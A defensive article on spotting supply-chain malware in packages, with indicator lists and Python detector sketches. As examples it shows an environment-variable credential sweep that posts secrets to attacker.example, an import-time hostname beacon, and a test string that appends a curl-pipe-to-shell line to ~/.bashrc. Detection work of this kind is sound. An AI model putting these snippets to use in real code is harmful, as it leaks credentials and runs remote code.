The Limits of Signature Detection

Signature-based malware scanning works by matching code against known patterns. A hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued, and ineffective for everything else.

Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.
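
To make the evasion concrete, here is a minimal sketch of hash-based matching. The signature database, the sample bytes, and the helper name matches_signature are all made up for illustration; real scanners use richer signatures than a single SHA-256 digest, but an exact hash match fails in the same way.

```python
import hashlib

# Hypothetical signature database: SHA-256 digests of previously catalogued samples.
KNOWN_SAMPLE = b"fetch('https://attacker.example/collect')"
SIGNATURE_DB = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}


def matches_signature(payload: bytes) -> bool:
    """Return True when the payload's hash is already in the database."""
    return hashlib.sha256(payload).hexdigest() in SIGNATURE_DB


# A trivially obfuscated variant: same resulting URL, different bytes.
variant = b"fetch('https://attacker' + '.example/collect')"

print(matches_signature(KNOWN_SAMPLE))  # True: the catalogued sample is caught
print(matches_signature(variant))       # False: the new variant slips through
```

Splitting one string literal is enough to change the digest, which is why per-campaign variants defeat exact-match signatures.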

The detection gap: Between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window from first deployment to detection is measured in hours, which is enough to exfiltrate credentials from every CI run in that period.

Network Behaviour Indicators

Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:

  • Hardcoded external URLs in unexpected contexts: a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
  • Dynamic URL construction: building URLs from string concatenation or encoding rather than using explicit constants
  • DNS-based communication: dns.resolve(), getaddrinfo() calls with data-derived hostnames
  • Network calls in lifecycle hooks: any outbound call in postinstall, class constructors, module initialisation, or process exit handlers
  • Unconditional background requests: requests that fire regardless of application logic, especially on startup

suspicious network call in module init (JavaScript)
// Red flag: network call executes at module load time,
// before any application code runs
const { hostname } = require('os');
const https = require('https');

// Immediately invoked: runs on require()
(() => {
  // https.get() returns a ClientRequest, not a Promise, so errors are
  // swallowed with an 'error' listener rather than .catch()
  https
    .get(
      `https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}`,
      (res) => res.resume() // discard the response body
    )
    .on('error', () => {});
})();
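
The same pattern can be looked for mechanically. The sketch below is one possible approach for Python sources, not a complete detector: it walks the syntax tree and reports network calls that sit outside any function body, so they would run at import time. The prefix list and the function names dotted_name and import_time_network_calls are assumptions made for this example.

```python
import ast

# Assumption: a small, illustrative list of network-capable module prefixes.
NETWORK_PREFIXES = ("urllib.request.", "requests.", "socket.", "http.client.")


def dotted_name(node: ast.AST) -> str:
    """Rebuild a dotted name such as 'urllib.request.urlopen' from an AST node."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def import_time_network_calls(source: str) -> list[tuple[int, str]]:
    """Return (line, call) pairs for network calls that run when the module is imported."""
    findings = []

    def visit(node: ast.AST) -> None:
        for child in ast.iter_child_nodes(node):
            # Function and lambda bodies only run when called, so skip them.
            if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
                continue
            if isinstance(child, ast.Call):
                name = dotted_name(child.func)
                if name.startswith(NETWORK_PREFIXES):
                    findings.append((child.lineno, name))
            visit(child)

    visit(ast.parse(source))
    return findings


sample = '''
import os
import urllib.request

urllib.request.urlopen("https://telemetry.example.com/ping?h=" + os.uname().nodename)

def fetch(url):
    return urllib.request.urlopen(url)
'''
print(import_time_network_calls(sample))  # [(5, 'urllib.request.urlopen')]
```

The call inside fetch() is not reported because it only runs when the application asks for it. Aliased imports (for example `from urllib.request import urlopen`) are not resolved here, so a real check would need to track import names as well.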

Persistence Indicators

Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:

  • Cron job creation: writing to /etc/cron.d/, invoking crontab, or using OS scheduling APIs
  • Shell profile modification: writes to ~/.bashrc, ~/.profile, ~/.zshrc
  • Startup service registration: writing systemd unit files, launchd plists, or Windows registry run keys
  • npm script or configuration injection: modifying ~/.npmrc settings or the scripts section of a package.json
  • Git hook installation: writing to .git/hooks/ directory in the checked-out repository
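
A simple way to surface these indicators is to search source text for references to the locations listed above. The following is a rough sketch under stated assumptions: the pattern table is illustrative and far from exhaustive, the systemd, LaunchAgents, and registry fragments are common examples chosen for this illustration, and persistence_hits is a hypothetical helper name.

```python
import re

# Assumption: an illustrative, non-exhaustive set of patterns based on the list above.
PERSISTENCE_PATTERNS = {
    "cron": re.compile(r"/etc/cron\.d/|\bcrontab\b"),
    "shell profile": re.compile(r"\.(bashrc|profile|zshrc)\b"),
    "startup service": re.compile(r"/etc/systemd/system/|LaunchAgents|CurrentVersion\\+Run"),
    "git hook": re.compile(r"\.git/hooks/"),
}


def persistence_hits(source: str) -> list[tuple[int, str]]:
    """Return (line number, indicator label) for each line that mentions a persistence location."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in PERSISTENCE_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


sample = '''import os
with open(os.path.expanduser("~/.bashrc"), "a") as fh:
    fh.write("curl -s https://attacker.example/x | sh")
hook_path = ".git/hooks/pre-commit"
'''
print(persistence_hits(sample))  # [(2, 'shell profile'), (4, 'git hook')]
```

Plain text matching like this is easy to evade with string splitting or encoding, so it is best treated as a first pass that points a reviewer at lines worth reading.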

Data Access Indicators

What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:

  • Environment variable mass collection: iterating all environment variables rather than accessing specific named ones
  • Credential file access: reading ~/.aws/credentials, ~/.ssh/id_rsa, ~/.npmrc, ~/.docker/config.json
  • Browser data access: reading browser cookie files, saved passwords, or local storage
  • Clipboard access: reading system clipboard content (typically to replace a copied cryptocurrency wallet address with the attacker's)
  • Keylogging APIs: hooking keyboard events at the OS level

environment credential sweep (Python)
import os, json, urllib.request

# Mass environment variable sweep: high-confidence malware indicator
sensitive = {
    k: v for k, v in os.environ.items()
    if any(kw in k.lower() for kw in
       ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api'])
}
urllib.request.urlopen(
    'https://attacker.example/collect',
    data=json.dumps(sensitive).encode()
)
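
The difference between sweeping the environment and reading a named variable is visible in the syntax tree. As a minimal sketch (the helper names environ_sweeps and _is_os_environ are invented here, and only the literal spelling os.environ is recognised), a check might look like this:

```python
import ast


def _is_os_environ(node: ast.AST) -> bool:
    """True for the expression os.environ (aliases are not resolved)."""
    return (
        isinstance(node, ast.Attribute)
        and node.attr == "environ"
        and isinstance(node.value, ast.Name)
        and node.value.id == "os"
    )


def environ_sweeps(source: str) -> list[int]:
    """Return line numbers where os.environ is enumerated rather than read by name."""
    lines = []
    for node in ast.walk(ast.parse(source)):
        # os.environ.items(), .keys(), .values(), .copy()
        if (
            isinstance(node, ast.Call)
            and isinstance(node.func, ast.Attribute)
            and node.func.attr in {"items", "keys", "values", "copy"}
            and _is_os_environ(node.func.value)
        ):
            lines.append(node.lineno)
        # "for name in os.environ" loops and comprehensions
        elif isinstance(node, (ast.For, ast.comprehension)) and _is_os_environ(node.iter):
            lines.append(node.iter.lineno)
    return sorted(lines)


sample = '''import os
token = os.environ["API_TOKEN"]
home = os.environ.get("HOME")
stolen = {k: v for k, v in os.environ.items()}
for name in os.environ:
    print(name)
'''
print(environ_sweeps(sample))  # [4, 5]
```

Lines 2 and 3 of the sample read specific named variables and are left alone; only the enumeration on lines 4 and 5 is reported.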

Structural Code Anomalies

Malicious code often has structural characteristics that differ from legitimate code:

  • Seemingly unreachable code following legitimate logic: blocks that look dead but sit behind a condition, so a static analyser doesn't flag them as dead
  • Asymmetric function complexity: one function that is dramatically more complex than everything else in the file
  • Comment-code ratio outliers: malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
  • String-heavy code without surrounding context: large string constants that have no obvious relationship to the function they appear in
  • Unexpected imports: a library that processes images importing network and process execution modules
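
Asymmetric complexity is one of the easier anomalies to approximate. The sketch below uses the number of syntax-tree nodes per function as a crude complexity proxy and flags functions far above the file's median. The ratio of 5 and the names function_sizes and complexity_outliers are assumptions for illustration, not an established metric.

```python
import ast
from statistics import median


def function_sizes(source: str) -> dict[str, int]:
    """Map each function name to its AST node count (a crude complexity proxy)."""
    sizes = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            sizes[node.name] = sum(1 for _ in ast.walk(node))
    return sizes


def complexity_outliers(source: str, ratio: float = 5.0) -> list[str]:
    """Return functions whose size exceeds `ratio` times the median function size."""
    sizes = function_sizes(source)
    if len(sizes) < 3:  # too few functions to say what "typical" means
        return []
    typical = median(sizes.values())
    return [name for name, size in sizes.items() if size > ratio * typical]


# Build a synthetic file: four tiny helpers and one unusually dense function.
small = "\n".join(f"def helper_{i}(x):\n    return x + {i}\n" for i in range(4))
big = (
    "def resize(img):\n"
    + "".join(f"    v{i} = (img[{i}] ^ {i}) + len(str({i}))\n" for i in range(30))
    + "    return img\n"
)
print(complexity_outliers(small + big))  # ['resize']
```

A large function is not malicious by itself; the result is only a pointer to where a reviewer should look first.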

Contextual and Metadata Signals

Beyond the code itself, metadata provides high-signal indicators:

  • New package with high download velocity: organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
  • Package published immediately before a CI run: coordinated attacks time publication to coincide with known CI schedules
  • Maintainer account age vs. package age: a maintainer account created days before publishing a popular-seeming package
  • Mismatch between package description and actual code: a package claiming to be a utility library that imports network and process modules
  • Empty or minimal source repository: a published package with no corresponding public source repository, or a repository with one commit
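
Several of these metadata signals reduce to date arithmetic and presence checks. The following sketch assumes a hypothetical PackageMetadata record; real registries expose this information in different shapes, and the 30-day and 7-day thresholds and the example dates are invented for illustration.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class PackageMetadata:
    # Hypothetical record; field names are assumptions, not a registry API.
    first_published: datetime
    maintainer_created: datetime
    repository_url: Optional[str]
    repository_commits: int


def metadata_flags(
    meta: PackageMetadata,
    now: datetime,
    young: timedelta = timedelta(days=30),
) -> list[str]:
    """Return the metadata indicators that apply to this package."""
    flags = []
    if now - meta.first_published < young:
        flags.append("new package")
    if meta.first_published - meta.maintainer_created < timedelta(days=7):
        flags.append("maintainer account created shortly before publishing")
    if not meta.repository_url:
        flags.append("no source repository")
    elif meta.repository_commits <= 1:
        flags.append("single-commit repository")
    return flags


# Made-up example values.
meta = PackageMetadata(
    first_published=datetime(2024, 5, 10),
    maintainer_created=datetime(2024, 5, 8),
    repository_url=None,
    repository_commits=0,
)
print(metadata_flags(meta, now=datetime(2024, 5, 12)))
# ['new package', 'maintainer account created shortly before publishing', 'no source repository']
```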

Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination (network call + environment variable access + new package + no source repository) that supports a high-confidence malware classification.
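
One simple way to express this rule is to count how many independent indicators fire and escalate only when several agree. This is a sketch, not a calibrated classifier: the signal names, the cut-offs of two and three, and the function name classify are assumptions chosen for the example.

```python
# Assumption: signal names mirror the indicators discussed above.
KNOWN_SIGNALS = {"network_call", "env_var_access", "new_package", "no_source_repo"}


def classify(observed: set[str]) -> str:
    """Grade a package by how many distinct known indicators were observed."""
    hits = KNOWN_SIGNALS & observed
    if len(hits) >= 3:
        return "high confidence"
    if len(hits) == 2:
        return "needs review"
    return "low"


print(classify({"network_call"}))                                  # low
print(classify({"network_call", "env_var_access"}))                # needs review
print(classify({"network_call", "env_var_access", "new_package"}))  # high confidence
```

A single network call stays at "low", which matches the point that legitimate telemetry exists; only agreement across several indicators raises the grade.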